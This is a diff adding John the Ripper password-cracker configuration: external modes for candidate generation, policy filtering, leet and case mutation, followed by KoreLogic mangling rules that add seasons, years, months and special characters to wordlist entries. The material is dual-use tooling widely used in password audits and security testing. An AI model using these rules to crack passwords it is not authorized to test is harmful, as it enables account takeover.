+	while (i--)
+		subid[i] = charcount;
+	subset[0] = c0 = 0;
+	last = maxlength - 1;
+	lastid = -1;
+}
+
+void generate()
+{
+	int i;
+
+/* Handle the typical case specially */
+	if (word[last] = subset[++lastid]) return;
+
+	lastid = 0;
+	word[i = last] = c0;
+	while (i--) {			// Have a preceding position?
+		if (word[i] = subset[++id[i]]) return;
+		id[i] = 0;
+		word[i] = c0;
+	}
+
+	if (++last < maxlength) {	// Next length?
+		id[last] = lastid = 0;
+		word[last] = c0;
+		word[last + 1] = 0;
+		return;
+	}
+
+/* Next subset */
+	if (subcount) {
+		int j;
+		i = subcount - 1;
+		j = charcount;
+		while (++subid[i] >= j) {
+			if (i--) {
+				j--;
+				continue;
+			}
+			subid[i = 0] = 0;
+			subset[++subcount] = 0;
+			break;
+		}
+	} else {
+		subid[i = 0] = 0;
+		subset[++subcount] = 0;
+	}
+	subset[i] = charset[subid[i]];
+	while (++i < subcount)
+		subset[i] = charset[subid[i] = subid[i - 1] + 1];
+
+	if (subcount > maxdiff) {
+		word = 0;		// Done
+		return;
+	}
+
+/*
+ * We won't be able to fully use the subset if the length is smaller than the
+ * character count.  We assume that we've tried all smaller subsets before, so
+ * we don't bother with such short lengths.
+ */
+	if (minlength < subcount)
+		last = subcount - 1;
+	else
+		last = minlength - 1;
+	c0 = subset[0];
+	i = 0;
+	while (i <= last) {
+		id[i] = 0;
+		word[i++] = c0;
+	}
+	lastid = 0;
+	word[i] = 0;
+}
+
+# Simple password policy matching: require at least one digit.
+[List.External:AtLeast1-Simple]
+void filter()
+{
+	int i, c;
+
+	i = 0;
+	while (c = word[i++])
+		if (c >= '0' && c <= '9')
+			return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# The same password policy implemented in a more efficient and more generic
+# fashion (easy to expand to include other "sufficient" characters as well).
+[List.External:AtLeast1-Generic]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0; // Terminate the loop in filter() on NUL
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 1; // Continue looping in filter() on most chars
+
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 0; // Terminate the loop in filter() on digits
+}
+
+void filter()
+{
+	int i;
+
+	i = -1;
+	while (mask[word[++i]])
+		continue;
+	if (word[i])
+		return; // Found at least one suitable character, good
+
+	word = 0; // No suitable characters found, skip this "word"
+}
+
+# An efficient and fairly generic password policy matcher.  The policy to match
+# is specified in the check at the end of filter() and in mask[].  For example,
+# lowercase and uppercase letters may be treated the same by initializing the
+# corresponding mask[] elements to the same value, then adjusting the value to
+# check "seen" for accordingly.
+[List.External:Policy]
+int mask[0x100];
+
+void init()
+{
+	int c;
+
+	mask[0] = 0x100;
+	c = 1;
+	while (c < 0x100)
+		mask[c++] = 0x200;
+
+	c = 'a';
+	while (c <= 'z')
+		mask[c++] = 1;
+	c = 'A';
+	while (c <= 'Z')
+		mask[c++] = 2;
+	c = '0';
+	while (c <= '9')
+		mask[c++] = 4;
+}
+
+void filter()
+{
+	int i, seen;
+
+/*
+ * This loop ends when we see NUL (sets 0x100) or a disallowed character
+ * (sets 0x200).
+ */
+	i = -1; seen = 0;
+	while ((seen |= mask[word[++i]]) < 0x100)
+		continue;
+
+/*
+ * We should have seen at least one character of each type (which "add up"
+ * to 7) and then a NUL (adds 0x100), but not any other characters (would
+ * add 0x200).  The length must be 8.
+ */
+	if (seen != 0x107 || i != 8)
+		word = 0; // Does not conform to policy
+}
+
+# Append the Luhn algorithm digit to arbitrary all-digit strings.  Optimized
+# for speed, not for size nor simplicity.  The primary optimization trick is to
+# compute the length and four sums in parallel (in two SIMD'ish variables).
+# Then whether the length is even or odd determines which two of the four sums
+# are actually used.  Checks for non-digits and for NUL are packed into the
+# SIMD'ish bitmasks as well.
+[List.External:AppendLuhn]
+int map1[0x100], map2[0x1fff];
+
+void init()
+{
+	int i;
+
+	map1[0] = ~0x7fffffff;
+	i = 1;
+	while (i < 0x100)
+		map1[i++] = ~0x7effffff;
+	i = -1;
+	while (++i < 10)
+		map1['0' + i] = i + ((i * 2 % 10 + i / 5) << 12);
+	i = -1;
+	while (++i < 0x1fff) {
+		if (i % 10)
+			map2[i] = '9' + 1 - i % 10;
+		else
+			map2[i] = '0';
+	}
+}
+
+void filter()
+{
+	int i, o, e;
+
+	i = o = e = 0;
+	while ((o += map1[word[i++]]) >= 0) {
+		if ((e += map1[word[i++]]) >= 0)
+			continue;
+		if (e & 0x01000000)
+			return; // Not all-digit, leave unmodified
+		word[i--] = 0;
+		word[i] = map2[(e & 0xfff) + (o >> 12)];
+		return;
+	}
+	if (o & 0x01000000)
+		return; // Not all-digit, leave unmodified
+	word[i--] = 0;
+	word[i] = map2[(o & 0xfff) + (e >> 12)];
+}
+
+# Trivial Rotate function, which rotates letters in a word
+# by a given number of places (like 13 in case of ROT13).
+# Words which don't contain any letters (and thus wouldn't be changed
+# by this filter) are skipped, because these unchanged words probably
+# should have been tried before trying a mangled version.
+[List.External_base:Filter_Rotate]
+
+int rot; // The number of places to rotate each letter in a word
+
+void filter()
+{
+	int i, j, c;
+
+	i = 0;
+	j = 0; // j counts the number of changed characters
+
+	while (c = word[i]) {
+		if (c >= 'a' && c <= 'z') {
+			c = c - 26 + rot;
+			if (c < 'a') c += 26;
+			word[i] = c;
+			j++;
+		} else if (c >= 'A' && c <= 'Z' ) {
+			c = c - 26 + rot;
+			if (c < 'A') c += 26;
+			word[i] = c;
+			j++;
+		}
+		i++;
+	}
+	if (j == 0)
+		// Nothing changed. Reject this word.
+		word = 0;
+}
+
+# ROT13 Example
+[List.External:Filter_ROT13]
+.include [List.External_base:Filter_Rotate]
+void init()
+{
+	// Just in case someone wants to "rotate" by other values,
+	// adjust the value of the rot variable
+	// (may be in a copied external mode):
+	// 	13: "abcABCxyzXYZ" -> "nopNOPklmKLM"
+	// 	 1: "abcABCxyzXYZ" -> "bcdBCDyzaYZA"
+	// 	25: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// 	-1: "abcABCxyzXYZ" -> "zabZABwxyWXY"
+	// and so on
+	// Allowed range: -25 <= rot <= -1, or 1 <= rot <= 25
+	rot = 13;
+
+	// Don't change the following statement.
+	// It is supposed to "sanitize" the value to be in the
+	// range
+	rot = (rot + 26) % 26;
+}
+
+# Trivial parallel processing example (obsoleted by the "--node" option)
+[List.External:Parallel]
+/*
+ * This word filter makes John process some of the words only, for running
+ * multiple instances on different CPUs.  It can be used with any cracking
+ * mode except for "single crack".  Note: this is not a good solution, but
+ * is just an example of what can be done with word filters.
+ */
+
+int node, total;			// This node's number, and node count
+int number;				// Current word number
+
+void init()
+{
+	node = 1; total = 2;		// Node 1 of 2, change as appropriate
+	number = node - 1;		// Speedup the filter a bit
+}
+
+void filter()
+{
+	if (number++ % total)		// Word for a different node?
+		word = 0;		// Yes, skip it
+}
+
+# Interrupt the cracking session after "max" words tried
+[List.External:AutoAbort]
+int max;				// Maximum number of words to try
+int number;				// Current word number
+
+void init()
+{
+	max = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (++number > max)
+		abort = 1;		// Interrupt the cracking session
+}
+
+# Print the status line after every "interval" words tried
+[List.External:AutoStatus]
+int interval;				// How often to print the status
+int number;				// Current word number
+
+void init()
+{
+	interval = 1000;
+	number = 0;
+}
+
+void filter()
+{
+	if (number++ % interval)
+		return;
+	status = 1;			// Print the status line
+}
+
+#
+# Reference example hybrid-mode external. same as jtr-rule: $[0-9]$[0-9]
+# this format is to be used similar to a filter, in that it requires some
+# other word generator (markov, wordlist, etc).  However, this type external
+# will get new() called with each word, and then have next() called, until
+# the word[0]=0 is seen (meaning all candidates for the base word have been
+# generated.  Prior to new() or restore(), word[] is the 'base' word.
+# if the script is able to properly resume, then it should set the global
+# variable hybrid_total to the count of candidates that will be generated
+# for this word (in new() / restore(), then in the body of restore() there
+# is a global variable set 'hybrid_resume' that was the prior number of
+# canidates generated for this base-word.  Resume should start at the NEXT
+# If the script is not able to easily resume, then simply do NOT set the
+# global hybrid_total to anything either function.  JtR will 'still' resume
+# propery, but it will do so by calling new()/next()/next().../next() until
+# back to the proper resume location.
+#
+# script changed to append a _ character before the number, each time within
+# the next() function. Done this way to better validate that -restore within
+# jtr is working properly.
+#
+[List.External:Hybrid_example]
+/* static vars for the script */
+int cnt, length, total;
+
+void init()
+{
+	/* in this simple example, we always generate 100 candidates per word */
+	total = 100;/* this is a VERY simple example */
+}
+
+/* new word */
+void new()
+{
+	/* get the word length) */
+	length = 0; while (word[length++]) ; --length;
+
+	/*
+	 * If this was a more complex script, we would compute total candidates
+	 * at this location, if we can. If we can not compute total candidates
+	 * then it is likely we can not resume 'easily', so if that is the
+	 * case, we would simply set hybrid_total to -1, or do nothing, since
+	 * do_external_hybrid_crack() sets it to -1 before calling this function.
+	 */
+	 hybrid_total = total;
+
+	/* Reset or counter for THIS word. */
+	cnt = 0;
+
+	/*
+	 * word will be too long to be used, or too short to be used. If so
+	 * then set hybrid_total to 0 and this entire word will be skipped.
+	 */
+	if (req_minlen > length - 2 || (req_maxlen && req_maxlen < length + 2))
+		hybrid_total = 0;
+}
+
+void next()
+{
+	/* in this simple script, if cnt is 100, this word is DONE */
+	if (cnt == 100) {
+		word[0] = 0;
+		return;
+	}
+
+	/* set word[] to the next candidate */
+	word[length++] = '_';
+	word[length  ] = '0' + cnt / 10;
+	word[length+1] = '0' + cnt % 10;
+	word[length+2] = 0;
+	++cnt;
+}
+
+/* Called when restoring an interrupted session */
+void restore()
+{
+	int i;
+
+	length = 0; while (word[length++]) ; --length;
+
+	/* for this simple script, simply setting cnt resumes */
+	cnt = hybrid_resume + 1; if (cnt > 100) cnt=100;
+	i = 0;
+	while (i++ < cnt) word[length++] = '_';
+	word[length] = 0;
+
+	/* tell john that we have properly 'resumed', by setting a 'proper' total */
+	hybrid_total = total;
+}
+
+# External hybrid 'leet code
+[List.External:Leet]
+/*
+ * 1337 language in this script:
+ *   a -> a4@
+ *   b -> b8
+ *   e -> e3
+ *   g -> g9
+ *   i -> i1!
+ *   l -> l1
+ *   o -> o0
+ *   s -> s$5
+ *   t -> t7
+ */
+
+int rotor[626]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int max_mangle_letters;
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	/* note, 3^10 is 59k so aaaaaaaaaa will produce that many words! */
+	max_mangle_letters = 10; /* only mangle 10 characters max */
+	max_mangle = 4000; /* Stop building new letters if our count goes over this value */
+	original_word = 0;
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle_letters && hybrid_total < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		if (word[wlen] == 'a') {
+			rotor[rotor_off++] = 'a';
+			rotor[rotor_off++] = '4';
+			rotor[rotor_off++] = '@';
+		}
+		else if (word[wlen] == 'b') {
+			rotor[rotor_off++] = 'b';
+			rotor[rotor_off++] = '8';
+		}
+		else if (word[wlen] == 'e') {
+			rotor[rotor_off++] = 'e';
+			rotor[rotor_off++] = '3';
+		}
+		else if (word[wlen] == 'g') {
+			rotor[rotor_off++] = 'g';
+			rotor[rotor_off++] = '9';
+		}
+		else if (word[wlen] == 'i') {
+			rotor[rotor_off++] = 'i';
+			rotor[rotor_off++] = '1';
+			rotor[rotor_off++] = '!';
+		}
+		else if (word[wlen] == 'l') {
+			rotor[rotor_off++] = 'l';
+			rotor[rotor_off++] = '1';
+		}
+		else if (word[wlen] == 'o') {
+			rotor[rotor_off++] = 'o';
+			rotor[rotor_off++] = '0';
+		}
+		else if (word[wlen] == 's') {
+			rotor[rotor_off++] = 's';
+			rotor[rotor_off++] = '$';
+			rotor[rotor_off++] = '5';
+		}
+		else if (word[wlen] == 't') {
+			rotor[rotor_off++] = 't';
+			rotor[rotor_off++] = '7';
+		}
+		if (rotor_off > rotor_ptr[wlen]) {
+			rotor_cnt[wlen] = rotor_off-rotor_ptr[wlen];
+			hybrid_total *= rotor_cnt[wlen];
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# External hybrid CaSE mutation code
+[List.External:Case]
+
+int rotor[251]; /* max length input is 125 bytes [125*5+1]; */
+int rotors[125];
+int rotor_ptr[125];
+int rotor_idx[125];
+int rotor_cnt[125];
+int current_word_count;
+int max_mangle; /* controls how many bytes we run through our 'leet' code */
+int original_word; /* if set to 1 then we start with original word. If 0, then start with first mangled word */
+
+void init()
+{
+	max_mangle = 20; /* only mangle 20 characters max (2^20 is 1 million) */
+	original_word = 1; /* for case mangle, unless the data is 100% lower case, we really can not skip the original word */
+}
+
+/* new word */
+void new()
+{
+	int rotor_off, idx, wlen, ch;
+	idx = rotor_off = wlen = 0;
+	hybrid_total = 1;
+	while (word[wlen++]) ; --wlen;
+	if (req_minlen > wlen || (req_maxlen && req_maxlen < wlen )) {
+		hybrid_total = 0;
+		return;
+	}
+	wlen = 0;
+	while (word[wlen] && idx < max_mangle) {
+		rotor_cnt[wlen] = rotor_idx[wlen] = 0;
+		rotor_ptr[wlen] = rotor_off;
+		ch = word[wlen];
+		if (ch >= 'A' && ch <= 'Z') {
+			ch += 0x20;
+			word[wlen] = ch;
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+		}
+		if (ch >= 'a' && ch <= 'z') {
+			rotor[rotor_off++] = ch;
+			rotor[rotor_off++] = ch-0x20;
+			rotor_cnt[wlen] = 2;
+			hybrid_total *= 2;
+			rotors[idx++] = wlen;
+		}
+		++wlen;
+	}
+	/* hybrid_total+666 is our indicator that this is the original word */
+	if (original_word)
+		current_word_count = hybrid_total+666;
+	else {
+		current_word_count = 1; /* skip the 'original' word */
+	}
+}
+
+/* next iteration of this word word */
+void next()
+{
+	int idx, idx2;
+	if (current_word_count >=  hybrid_total) {
+		if (current_word_count == hybrid_total+666) {
+			/* first word (starting word) we leave alone */
+			/* by making it > hybrid_total, we avoid a 2nd if statement */
+			current_word_count = 1;
+			return;
+		}
+		word[0] = 0;
+		return;
+	}
+	idx = rotors[idx2=0];
+	while (++rotor_idx[idx] >= rotor_cnt[idx]) {
+		rotor_idx[idx] = 0;
+		word[idx] = rotor[ rotor_ptr[idx] ];
+		idx = rotors[++idx2];
+	}
+	word[idx] = rotor[ rotor_ptr[idx]+rotor_idx[idx] ];
+	++current_word_count;
+}
+/* restore() not needed. john properly restores fast enough without it */
+
+# Alternate hybrid external 'leet' mode (HybridLeet)
+.include <hybrid.conf>
+
+# dumb-force UTF-16, in an external file
+.include <dumb16.conf>
+
+# dumb-force UTF-32, in an external file
+.include <dumb32.conf>
+
+# repeats UTF-16, in an external file
+.include <repeats16.conf>
+
+# repeats UTF-32, in an external file
+.include <repeats32.conf>
+
+# Dynamic ($dynamic_n$) scripting code, in an external file
+.include <dynamic.conf>
+
+# Regex alphabets
+.include <regex_alphabets.conf>
+
+# NOTE, this file (john.local.conf) is deprecated. If you had any modified logic in this
+# file, please create and move it to john-local.conf.  The file simply can be renamed to
+# the new john-local.conf if you so choose.
+.include '$JOHN/john.local.conf'
+
+# include john-local.conf (This file can be created by user, to override defaults in this john.conf file)
+.include '$JOHN/john-local.conf'
+
+# include john-local.conf in local dir, it can override john.conf, john-local.conf (or any other conf file loaded)
+.include './john-local.conf'
+
+# End of john.conf file.
+# Keep this comment, and blank line above it, to make sure a john-local.conf
+# that does not end with \n is properly loaded.
@@ -0,0 +1,522 @@
+####################################################################
+# KoreLogic Custom John the Ripper Rules:
+####################################################################
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:PrependSeason]
+a6 A0"[Ss$][uU][mM][mM][eE3][rR]"
+a6 A0"[Ww][iI|][nN][tT+][eE3][rR]"
+a4 A0"[Ff][aA][lL][lL]"
+a6 A0"[Ss][pP][rR][iI][nN][gG]"
+a6 A0"[Aa][uU][tT][uU][mM][nN]"
+
+# Use this rule with 2EVERYTHING.dic or 3EVERYTHING.dic
+[List.Rules:AppendSeason]
+a6 Az"[Ss$][uU][mM][mM][eE3][rR]"
+a6 Az"[Ww][iI|][nN][tT+][eE3][rR]"
+a6 Az"[Ff][aA][lL][lL]"
+a6 Az"[Ss][pP][rR][iI][nN][gG]"
+a6 Az"[Aa][uU][tT][uU][mM][nN]"
+
+[List.Rules:PrependHello]
+a5 A0"[hH][eE][lL][lL][oO0]"
+
+[List.Rules:PrependYears]
+a4 A0"20[0-1][0-9]"
+a4 A0"19[3-9][0-9]"
+
+# Notice: Your wordlist should likely be all lowercase - or you are wasting work
+[List.Rules:AppendYears]
+-[c:] a4 \p[c:] Az"19[0-9][0-9]"
+-[c:] a4 \p[c:] Az"20[01][0-9]"
+
+# Notice how we
+# 1) do caps first b/c they are more common in 'complex' environments
+# 2) Do !$@#%. first b/c they are the most common special chars
+[List.Rules:AppendCurrentYearSpecial]
+-[c:] a5 \p[c:] Az"201[0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq201[0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4Num]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append5Num]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:Append6Num]
+-[c:] a6 \p[c:] Az"[0-9][0-9][0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendSpecial3num]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:AppendSpecial4num]
+-[c:] a5 \p[c:] Az"[!$@#%.][0-9][0-9][0-9][0-9]"
+-[c:] a5 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9][0-9]q
+
+[List.Rules:PrependCAPCAPAppendSpecial]
+a3 A0"[A-Z][A-Z]" $[!$@#%.]
+a3 A0"[A-Z][A-Z]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNumAppendSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[!$@#%.]
+-[c:] a3 \p[c:] A0"[0-9][0-9]" $[^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:PrependNumNum]
+-[c:] a2 \p[c:] A0"[0-9][0-9]"
+
+[List.Rules:PrependNumNumNum]
+-[c:] a3 \p[c:] A0"[0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumNumNum]
+-[c:] a4 \p[c:] A0"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:PrependNumNumSpecial]
+-[c:] a3 \p[c:] A0"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] A0q[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Prepend2NumbersAppend2Numbers]
+-[c:] a4 \p[c:] A0"[0-9][0-9]" Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecial]
+-[c:] a2 \p[c:] A0q[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendSpecialNumberNumber]
+-[c:] a3 \p[c:] Az"[!$@#%.][0-9][0-9]"
+-[c:] a3 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+
+[List.Rules:AppendSpecialNumberNumberNumber]
+-[c:] a4 \p[c:] Az"[!$@#%.][0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9][0-9]q
+
+[List.Rules:PrependSpecialSpecialAppendNumber]
+-[c:] a3 \p[c:] A0"[!$@#%.][!$@#%.]" $[0-9]
+-[c:] a3 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q $[0-9]
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumber]
+-[c:] a4 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9]"
+-[c:] a4 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9]"
+
+[List.Rules:PrependSpecialSpecialAppendNumbersNumberNumber]
+-[c:] a5 \p[c:] A0"[!$@#%.][!$@#%.]" Az"[0-9][0-9][0-9]"
+-[c:] a5 \p[c:] A0q[^&()_+\-={}|[\]\\;'":,/<>?`~*][^&()_+\-={}|[\]\\;'":,/<>?`~*]q Az"[0-9][0-9][0-9]"
+
+[List.Rules:Append2Letters]
+a2 Az"[a-z][a-z]"
+-c a2 Az"[A-Z][A-Z]"
+-c a2 Az"[a-z][A-Z]"
+-c a2 Az"[A-Z][a-z]"
+
+[List.Rules:Prepend4NumAppendSpecial]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" $[!$@#%.]
+-[c:] a5 \p[c:] A0"[0-9][0-9][0-9][0-9]" Azq[^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append4NumSpecial]
+-[c:] a5 \p[c:] Az"[0-9][0-9][0-9][0-9][!$@#%.]"
+-[c:] a5 \p[c:] Azq[0-9][0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append3NumSpecial]
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][!$@#%.]"
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:Append2NumSpecial]
+-[c:] a3 \p[c:] Az"[0-9][0-9][!$@#%.]"
+-[c:] a3 \p[c:] Azq[0-9][0-9][^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+# Append numbers - but limit the total length.
+[List.Rules:AddJustNumbers]
+-[c:] <* >1 \p[c:] $[0-9]
+-[c:] <* >1 \p[c:] ^[0-9]
+-[c:] <- >1 \p[c:] Az"[0-9][0-9]"
+-[c:] <- >1 \p[c:] A0"[0-9][0-9]"
+-[c:] a3 >1 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 >1 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:DevProdTestUAT]
+-\r[::cc] a3 A\p\r[0l0l]"dev" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a3 A\p\r[0l0l]"uat" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"prod" \p\r[::TT]\p\r[::0l]
+-\r[::cc] a4 A\p\r[0l0l]"test" \p\r[::TT]\p\r[::0l]
+
+[List.Rules:PrependAndAppendSpecial]
+-[c:] a2 \p[c:] ^[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+
+[List.Rules:AppendJustNumbers]
+-[c:] <* \p[c:] $[0-9]
+-[c:] <- \p[c:] Az"[0-9][0-9]"
+-[c:] a3 \p[c:] Az"[0-9][0-9][0-9]"
+-[c:] a4 \p[c:] Az"[0-9][0-9][0-9][0-9]"
+
+[List.Rules:AppendNumbers_and_Specials_Simple]
+# cap first letter then add a 0  2 6 9 ! *  to the end
+-[c:] a1 \p[c:] $[0-9]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+# cap first letter then add a special char - THEN a number  !0 %9 !9 etc
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9]q
+# Cap the first letter - then add 0? 0! 5_ .. 9!
+## add NUMBER then SPECIAL    1! .. 9?
+-[c:] a2 \p[c:] Azq[0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Number Number Special
+-[c:] a3 \p[c:] Azq[0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+## Add Special Number Number
+-[c:] a3 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][0-9][0-9]q
+# Add 100! ... 999! to the end
+-[c:] a4 \p[c:] Azq[0-9][0-9][0-9][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:AppendJustSpecials]
+-[c:] a1 \p[c:] $[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]
+-[c:] a2 \p[c:] Azq[!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*][!$@#%.^&()_+\-={}|[\]\\;'":,/<>?`~*]q
+
+[List.Rules:MonthsFullPreface]
+-[:c] a7 A0"\p[jJ]anuary"
+-[:c] a8 A0"\p[fF]ebruary"
+-[:c] a5 A0"\p[mM]arch"
+-[:c] a5 A0"\p[aA]pril"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a6 A0"\p[aA]ugust"
+-[:c] a9 A0"\p[sS]eptember"
+-[:c] a7 A0"\p[oO]ctober"
+-[:c] a8 A0"\p[nN]ovember"
+-[:c] a8 A0"\p[dD]ecember"
+
+[List.Rules:AddShortMonthsEverywhere]
+a3 >\r[00123456789] A\p[z0-9]"[jJ][aA][nN]"
+a3 >\r[00123456789] A\p[z0-9]"[fF][eE][bB]"
+a3 >\r[00123456789] A\p[z0-9]"[mM][aA][rRyY]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][pP][rR]"
+a3 >\r[00123456789] A\p[z0-9]"[jJ][uU][nNlL]"
+a3 >\r[00123456789] A\p[z0-9]"[aA][uU][gG]"
+a3 >\r[00123456789] A\p[z0-9]"[sS][eE][pP]"
+a3 >\r[00123456789] A\p[z0-9]"[oO][cC][tT]"
+a3 >\r[00123456789] A\p[z0-9]"[nN][oO][vV]"
+a3 >\r[00123456789] A\p[z0-9]"[dD][eE][cC]"
+
+[List.Rules:Prepend4LetterMonths]
+## Preface each dictionary with Janu janu Febr febr
+-[:c] a4 A0"\p[jJ]anu"
+-[:c] a4 A0"\p[fF]ebr"
+-[:c] a4 A0"\p[mM]arc"
+-[:c] a3 A0"\p[aA]pr"
+-[:c] a3 A0"\p[mM]ay"
+-[:c] a4 A0"\p[jJ]une"
+-[:c] a4 A0"\p[jJ]uly"
+-[:c] a4 A0"\p[Aa]ugu"
+-[:c] a4 A0"\p[sS]ept"
+-[:c] a4 A0"\p[oO]cto"
+-[:c] a4 A0"\p[nN]ove"
+-[:c] a4 A0"\p[Dd]ece"
+
+# this will add the string '2010' at all places in the word:
+# USE this with a 4 or 5 char dictionary file with ALL characters
+# soo abcde will become
+# 2010abcde  a2010bcde  ab2010cde  acd2010de  abcd2010e  abcde2010
+[List.Rules:Add2010Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"201[0-9]"
+
+[List.Rules:PrependDaysWeek]
+a6 A0"[Mm][oO0][nN][dD][aA4@][yY]"
+a7 A0"[Tt][uU][eE3][sS$][dD][aA4@][yY]"
+a9 A0"[Ww][eE3][dD][nN][eE3][sS$][dD][aA4@][yY]"
+a8 A0"[Tt][hH][uU][rR][sS$][dD][aA4@][yY]"
+a6 A0"[Ff][rR][iI1!][dD][aA4@][yY]"
+a8 A0"[Ss][aA4@][tT+][uU][rR][dD][aA4@][yY]"
+a6 A0"[Ss][uU][nN][dD][aA4@][yY]"
+
+[List.Rules:Add1234_Everywhere]
+a4 >\r[00123456789] A\p[z0-9]"1234"
+
+[List.Rules:AppendMonthDay]
+-[:c] <* Az"\p[jJ]anuary"
+-[:c] a8 Az"\p[jJ]anuary[0-9]"
+-[:c] a9 Az"\p[jJ]anuary[0-9][0-9]"
+-[:c] <* Az"\p[fF]ebruary"
+-[:c] a9 Az"\p[fF]ebruary[0-9]"
+-[:c] aA Az"\p[fF]ebruary[0-9][0-9]"
+-[:c] <* Az"\p[mM]arch"
+-[:c] a6 Az"\p[mM]arch[0-9]"
+-[:c] a7 Az"\p[mM]arch[0-9][0-9]"
+-[:c] <* Az"\p[aA]pril"
+-[:c] a6 Az"\p[aA]pril[0-9]"
+-[:c] a7 Az"\p[aA]pril[0-9][0-9]"
+-[:c] <* Az"\p[mM]ay"
+-[:c] a4 Az"\p[mM]ay[0-9]"
